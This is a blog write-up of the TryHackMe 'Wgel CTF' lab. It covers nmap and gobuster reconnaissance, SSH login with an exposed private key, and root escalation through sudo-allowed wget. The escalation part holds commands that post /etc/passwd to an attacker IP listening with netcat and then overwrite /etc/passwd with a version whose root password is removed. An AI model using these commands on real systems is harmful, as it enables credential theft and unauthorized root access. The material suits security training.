Wgel CTF WriteUp [TryHackMe]

aayush malla
5 min readOct 13, 2020

--

Today we will be doing Wgel CTF Lab of TryHackMe.

Here our task is to find two flags i.e. user flag and root flag .

Now lets deploy the machine and then scan the machine using either nmap or zenmap.

Here I will be scanning the website ip address through nmap using following command

nmap -A ip_address

Here flag -A means aggressive scan which includes OS detection,version detection, script scanning and traceroute

fig: result of nmap

Here we can see that port 22(ssh) and port 80(http) are open so lets visit the website using the ip address .

On visiting the website we found that the apache2 Ubuntu default page is strange as there is some blank space at the end .

fig: Normal Apache2 Debian Default Page
fig: Apache2 Default Page of the given lab’s website

As we can see that there is some white space lets inspect the page . On inspecting we can find that there is a comment saying Jessie Don’t Forget to Update the Website.

fig : inspecting the apache2 default page of target machine

From this we know that the one of the user name is jessie.

Now lets use gobuster to identify the directories of the website .

gobuster dir -u http://ip -w /usr/share/wordlists/dirb/common.txt

Here we will be using common.txt as wordlist.

fig : gobuster for http://ip

Here we can see that we have a directory /sitemap now lets again use gobuster the directory of http://ip/sitemap

gobuster dir -u http://ip/sitemap -w /usr/share/wordlists/dirb/common.txt

fig: gobuster for http://ip/sitemap

Here we can see /.ssh directory now lets go to that page[http://ip/sitemap/.ssh]

Here we can see the there is RSA Private Key so now lets copy the key and then paste it to a file in our local machine and change its permission using the command : chmod 600 filename[filename: id_rsa in mycase]

Now lets use this key to get ssh to the target machine.

Command used:

ssh -i id_rsa jessie@ip

fig: ssh to the target machine

BINGO !!! we get the ssh to the target machine.

Now lets go to Document directory and cat the user_flag.txt file to get the first user flag.

fig: user flag

Now we have to find the root flag which is usually store in /root directory but we can’t go to the root directory.

Now lets check what can our use jessie can run as root . For this use command

sudo -l

fig: checking the user privelege

Here we can see that jessie can run /usr/bin/wget as root so now lets use this misconfiguration to our benefit.

Now we will be using wget to transfer the content of /etc/passwd to our local machine and then we will create a new passwd and then transfer back it to the target machine.

Now at first lets transfer the content of /etc/passwd of target machine to our local machine.For this follow the below steps.

Use netcat to listen to particular port : nc -lnvp 9090

fig: listening to port 9090 usng netcat

Use wget to transfer the content of /etc/passwd to local machine

Now we will be trasnfering the content of /etc/passwd to the local machine using the command

sudo /usr/bin/wget — post-file=/etc/passwd 10.9.120.205:9090

Copy the Content of the /etc/passwd received at our local machine and save it to file passwd .

fig: Getting the content of /etc/passwd of target machine to our local machine

Here this is the content we will receive on our local machine where we were listening using netcat.

Now lets copy the content and paste it a new file name passwd.

Now change the ‘x’ in the root user entry of passwd to the magic password.

Here we can see the root entry list where x denotes that the passwd is save to the file /etc/shadow. Here we can change the x to our magic password :U6aMy0wojraho

This magic password means that we don’t have to enter password (just have to hit enter key)

Once we set x to this magic password then the /etc/passwd will not look into /etc/shadow file for root password.

fig : changing ‘x’ to magic password

Transfer the file back to the target machine

Now we will create a simpleHTTPServer using python and hosting passwd file in our local machine using command

python -m SimpleHTTPServer 8080

fig : Running HTTP server in port 8080

and then we will be using wget in our target machine to download the passwd file from our local machine and replace the passwd file with /etc/passwd of our target machine using command:

sudo /usr/bin/wget 10.9.120.205:8080/passwd -O /etc/passwd

fig: Downloading passwd from HTTP hosted in local machine and replace /etc/passwd by downloadd passwd

Now lets change user to root and hit only enter key in password and then traverse to /root directory and cat root_flag.txt

fig: Getting root privilege and getting root flag

BINGO we successfully get root privilege and then use it to print root flag.

--

--

aayush malla

Data Engineer, Cybersecurity enthusiast , PLSQL, Data Analyst